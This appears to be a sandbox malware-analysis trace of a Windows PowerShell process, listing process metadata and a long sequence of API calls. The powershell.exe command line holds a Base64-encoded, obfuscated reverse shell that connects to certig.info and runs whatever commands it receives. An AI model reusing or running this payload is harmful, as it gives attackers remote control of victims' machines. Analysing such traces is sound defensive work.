	[0230.382] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0230.387] ResetEvent (hEvent=0x4f8) returned 1

Thread:
	id = 316
	os_tid = 0xcd8


Process:
	id = "13"
	image_name = "wmiprvse.exe"
	filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
	page_root = "0x63b67000"
	os_pid = "0xa2c"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e990"
	monitor_reason = "rpc_server"
	parent_id = "3"
	os_parent_pid = "0x250"
	cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "32"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 178
	os_tid = 0xb0


Thread:
	id = 179
	os_tid = 0x7d0


Thread:
	id = 180
	os_tid = 0xa4c


Thread:
	id = 181
	os_tid = 0xa48


Thread:
	id = 182
	os_tid = 0xa44


Thread:
	id = 183
	os_tid = 0xa40


Thread:
	id = 184
	os_tid = 0xa34


Thread:
	id = 185
	os_tid = 0xa30


Thread:
	id = 284
	os_tid = 0xc48


Thread:
	id = 285
	os_tid = 0xc4c


Process:
	id = "14"
	image_name = "wmiprvse.exe"
	filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
	page_root = "0x73290000"
	os_pid = "0x500"
	os_integrity_level = "0x4000"
	os_privileges = "0x60800000"
	monitor_reason = "rpc_server"
	parent_id = "3"
	os_parent_pid = "0x250"
	cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\Network Service"
	bitness = "32"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00095653" [0xc000000f]


Thread:
	id = 200
	os_tid = 0x484


Thread:
	id = 201
	os_tid = 0x924


Thread:
	id = 203
	os_tid = 0xab0


Thread:
	id = 204
	os_tid = 0x7f0


Thread:
	id = 205
	os_tid = 0x658


Thread:
	id = 206
	os_tid = 0x64c


Thread:
	id = 207
	os_tid = 0x55c


Thread:
	id = 208
	os_tid = 0xa9c


Thread:
	id = 209
	os_tid = 0x954


Thread:
	id = 328
	os_tid = 0xd0c


Process:
	id = "15"
	image_name = "powershell.exe"
	filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2d414000"
	os_pid = "0x6dc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "8"
	os_parent_pid = "0x888"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGMAdwBFAEUAaAA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABNAHEAYQB1AHYAPQAoACQAYwB3AEUARQBoAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABGAGUAcwBSAGkAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABlAHYATABhAGMAPQAkAE0AcQBhAHUAdgAuAFIAZQBhAGQAKAAkAEYAZQBzAFIAaQAsADAALAAkAEYAZQBzAFIAaQAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAGsAcgBGAFEAagA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQARgBlAHMAUgBpACwAMAAsACQAZQB2AEwAYQBjACkAOwAkAHoAawBNAGEAaQA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAawByAEYAUQBqACAAMgA+ACYAMQApACkAOwAkAE0AcQBhAHUAdgAuAFcAcgBpAHQAZQAoACQAegBrAE0AYQBpACwAMAAsACQAegBrAE0AYQBpAC4ATABlAG4AZwB0AGgAKQA7ACQATQBxAGEAdQB2AC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABjAHcARQBFAGgALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwB3AEUARQBoAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 226
	os_tid = 0x1c4

	[0198.460] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0198.741] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0198.741] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0198.741] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0198.741] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0201.062] GetVersionExW (in: lpVersionInformation=0x5090c8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x5090c8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0201.062] GetLastError () returned 0x2
	[0201.064] GetVersionExW (in: lpVersionInformation=0x5090c8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x5090c8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0201.064] GetLastError () returned 0x2
	[0201.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ea4c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0201.071] GetLastError () returned 0x2
	[0201.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ea68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0201.078] GetLastError () returned 0x2
	[0201.078] GetVersionExW (in: lpVersionInformation=0x5090c8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x5090c8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0201.078] GetLastError () returned 0x2
	[0201.080] SetErrorMode (uMode=0x1) returned 0x1
	[0201.082] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x10eee8 | out: lpFileInformation=0x10eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0201.082] GetLastError () returned 0x2
	[0201.082] SetErrorMode (uMode=0x1) returned 0x1
	[0201.161] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x10ef6c | out: lpdwHandle=0x10ef6c) returned 0x94c
	[0201.162] GetLastError () returned 0x0
	[0201.259] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2955ac4 | out: lpData=0x2955ac4) returned 1
	[0201.262] VerQueryValueW (in: pBlock=0x2955ac4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10ef38, puLen=0x10ef34 | out: lplpBuffer=0x10ef38*=0x2955b60, puLen=0x10ef34) returned 1
	[0201.266] lstrlenW (lpString="䅁") returned 1
	[0201.277] VerQueryValueW (in: pBlock=0x2955ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x10eeb4, puLen=0x10eeb0 | out: lplpBuffer=0x10eeb4*=0x2955c3c, puLen=0x10eeb0) returned 1
	[0201.277] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0201.279] lstrcpyW (in: lpString1=0x5090b0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0201.279] VerQueryValueW (in: pBlock=0x2955ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x10eeb4, puLen=0x10eeb0 | out: lplpBuffer=0x10eeb4*=0x2955c90, puLen=0x10eeb0) returned 1
	[0201.279] lstrlenW (lpString="System.Management.Automation") returned 28
	[0201.279] lstrcpyW (in: lpString1=0x5090b0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0201.280] VerQueryValueW (in: pBlock=0x2955ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x10eeb4, puLen=0x10eeb0 | out: lplpBuffer=0x10eeb4*=0x2955cec, puLen=0x10eeb0) returned 1
	[0201.280] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0201.280] lstrcpyW (in: lpString1=0x5090b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0201.280] VerQueryValueW (in: pBlock=0x2955ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x10eeb4, puLen=0x10eeb0 | out: lplpBuffer=0x10eeb4*=0x2955d2c, puLen=0x10eeb0) returned 1
	[0201.280] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0201.280] lstrcpyW (in: lpString1=0x5090b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0201.280] VerQueryValueW (in: pBlock=0x2955ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x10eeb4, puLen=0x10eeb0 | out: lplpBuffer=0x10eeb4*=0x2955d94, puLen=0x10eeb0) returned 1
	[0201.280] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0201.280] lstrcpyW (in: lpString1=0x5090b0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0201.280] VerQueryValueW (in: pBlock=0x2955ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x10eeb4, puLen=0x10eeb0 | out: lplpBuffer=0x10eeb4*=0x2955e30, puLen=0x10eeb0) returned 1
	[0201.280] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0201.280] lstrcpyW (in: lpString1=0x5090b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0201.280] VerQueryValueW (in: pBlock=0x2955ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x10eeb4, puLen=0x10eeb0 | out: lplpBuffer=0x10eeb4*=0x2955e94, puLen=0x10eeb0) returned 1
	[0201.280] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0201.281] lstrcpyW (in: lpString1=0x5090b0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0201.281] VerQueryValueW (in: pBlock=0x2955ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x10eeb4, puLen=0x10eeb0 | out: lplpBuffer=0x10eeb4*=0x2955f10, puLen=0x10eeb0) returned 1
	[0201.281] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0201.281] lstrcpyW (in: lpString1=0x5090b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0201.281] VerQueryValueW (in: pBlock=0x2955ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x10eeb4, puLen=0x10eeb0 | out: lplpBuffer=0x10eeb4*=0x2955bb8, puLen=0x10eeb0) returned 1
	[0201.281] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0201.281] lstrcpyW (in: lpString1=0x5090b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0201.281] VerQueryValueW (in: pBlock=0x2955ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x10eeb4, puLen=0x10eeb0 | out: lplpBuffer=0x10eeb4*=0x0, puLen=0x10eeb0) returned 0
	[0201.281] VerQueryValueW (in: pBlock=0x2955ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x10eeb4, puLen=0x10eeb0 | out: lplpBuffer=0x10eeb4*=0x0, puLen=0x10eeb0) returned 0
	[0201.281] VerQueryValueW (in: pBlock=0x2955ac4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x10eeb4, puLen=0x10eeb0 | out: lplpBuffer=0x10eeb4*=0x0, puLen=0x10eeb0) returned 0
	[0201.281] VerQueryValueW (in: pBlock=0x2955ac4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10eea8, puLen=0x10eea4 | out: lplpBuffer=0x10eea8*=0x2955b60, puLen=0x10eea4) returned 1
	[0201.284] VerLanguageNameW (in: wLang=0x0, szLang=0x5090b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0201.285] VerQueryValueW (in: pBlock=0x2955ac4, lpSubBlock="\\", lplpBuffer=0x10eebc, puLen=0x10eeb8 | out: lplpBuffer=0x10eebc*=0x2955aec, puLen=0x10eeb8) returned 1
	[0201.294] GetCurrentProcessId () returned 0x6dc
	[0201.401] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x10e6f4 | out: lpLuid=0x10e6f4*(LowPart=0x14, HighPart=0)) returned 1
	[0201.404] GetLastError () returned 0x0
	[0201.407] GetCurrentProcess () returned 0xffffffff
	[0201.408] GetLastError () returned 0x0
	[0201.412] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x10e6f0 | out: TokenHandle=0x10e6f0*=0x31c) returned 1
	[0201.412] GetLastError () returned 0x0
	[0201.417] AdjustTokenPrivileges (in: TokenHandle=0x31c, DisableAllPrivileges=0, NewState=0x2958604*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0201.418] GetLastError () returned 0x0
	[0201.422] CloseHandle (hObject=0x31c) returned 1
	[0201.422] GetLastError () returned 0x0
	[0201.429] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6dc) returned 0x31c
	[0201.429] GetLastError () returned 0x0
	[0201.576] EnumProcessModules (in: hProcess=0x31c, lphModule=0x2958648, cb=0x100, lpcbNeeded=0x10eee4 | out: lphModule=0x2958648, lpcbNeeded=0x10eee4) returned 1
	[0201.582] GetLastError () returned 0x0
	[0201.586] GetModuleInformation (in: hProcess=0x31c, hModule=0x221d0000, lpmodinfo=0x2958788, cb=0xc | out: lpmodinfo=0x2958788*(lpBaseOfDll=0x221d0000, SizeOfImage=0x72000, EntryPoint=0x221d7363)) returned 1
	[0201.586] GetLastError () returned 0x0
	[0201.590] GetModuleBaseNameW (in: hProcess=0x31c, hModule=0x221d0000, lpBaseName=0x528ed0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0201.590] GetLastError () returned 0x0
	[0201.591] GetModuleFileNameExW (in: hProcess=0x31c, hModule=0x221d0000, lpFilename=0x528ed0, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0201.592] GetLastError () returned 0x0
	[0201.593] CloseHandle (hObject=0x31c) returned 1
	[0201.593] GetLastError () returned 0x0
	[0201.594] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x6dc) returned 0x31c
	[0201.594] GetLastError () returned 0x0
	[0201.597] GetExitCodeProcess (in: hProcess=0x31c, lpExitCode=0x2957c38 | out: lpExitCode=0x2957c38*=0x103) returned 1
	[0201.597] GetLastError () returned 0x0
	[0201.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3955278, Length=0x20000, ResultLength=0x10ef2c | out: SystemInformation=0x3955278, ResultLength=0x10ef2c*=0xfab0) returned 0x0
	[0201.742] EnumWindows (lpEnumFunc=0x26d3612, lParam=0x0) returned 1
	[0201.746] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.746] GetLastError () returned 0x0
	[0201.746] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.746] GetLastError () returned 0x0
	[0201.747] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.747] GetLastError () returned 0x0
	[0201.747] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.747] GetLastError () returned 0x0
	[0201.747] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.747] GetLastError () returned 0x0
	[0201.748] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.748] GetLastError () returned 0x0
	[0201.748] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.748] GetLastError () returned 0x0
	[0201.748] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.749] GetLastError () returned 0x0
	[0201.749] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.749] GetLastError () returned 0x0
	[0201.749] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.749] GetLastError () returned 0x0
	[0201.749] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x538
	[0201.749] GetLastError () returned 0x0
	[0201.749] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.749] GetLastError () returned 0x0
	[0201.750] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.750] GetLastError () returned 0x0
	[0201.750] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.750] GetLastError () returned 0x0
	[0201.750] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x514
	[0201.750] GetLastError () returned 0x0
	[0201.750] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.750] GetLastError () returned 0x0
	[0201.750] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x778
	[0201.750] GetLastError () returned 0x0
	[0201.750] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x778
	[0201.750] GetLastError () returned 0x0
	[0201.750] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x458
	[0201.751] GetLastError () returned 0x0
	[0201.751] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.751] GetLastError () returned 0x0
	[0201.751] GetWindowThreadProcessId (in: hWnd=0xa0266, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0xa18
	[0201.751] GetLastError () returned 0x0
	[0201.751] GetWindowThreadProcessId (in: hWnd=0x14017c, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x978
	[0201.751] GetLastError () returned 0x0
	[0201.751] GetWindowThreadProcessId (in: hWnd=0x5026a, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x838
	[0201.751] GetLastError () returned 0x0
	[0201.751] GetWindowThreadProcessId (in: hWnd=0x50160, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0xb2c
	[0201.752] GetLastError () returned 0x0
	[0201.752] GetWindowThreadProcessId (in: hWnd=0x40298, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x8d4
	[0201.752] GetLastError () returned 0x0
	[0201.752] GetWindowThreadProcessId (in: hWnd=0x4015e, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x874
	[0201.752] GetLastError () returned 0x0
	[0201.752] GetWindowThreadProcessId (in: hWnd=0x50268, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x9a8
	[0201.752] GetLastError () returned 0x0
	[0201.752] GetWindowThreadProcessId (in: hWnd=0x60106, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0xb40
	[0201.752] GetLastError () returned 0x0
	[0201.752] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0xa00
	[0201.752] GetLastError () returned 0x0
	[0201.753] GetWindowThreadProcessId (in: hWnd=0x900a6, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.753] GetLastError () returned 0x0
	[0201.753] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.753] GetLastError () returned 0x0
	[0201.753] GetWindowThreadProcessId (in: hWnd=0x400d0, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.753] GetLastError () returned 0x0
	[0201.753] GetWindowThreadProcessId (in: hWnd=0x400f0, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.753] GetLastError () returned 0x0
	[0201.753] GetWindowThreadProcessId (in: hWnd=0x300de, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.753] GetLastError () returned 0x0
	[0201.753] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.754] GetLastError () returned 0x0
	[0201.754] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.754] GetLastError () returned 0x0
	[0201.754] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x4ac
	[0201.754] GetLastError () returned 0x0
	[0201.754] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x9f0
	[0201.754] GetLastError () returned 0x0
	[0201.754] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0x10eb80 | out: lpdwProcessId=0x10eb80) returned 0x9e0
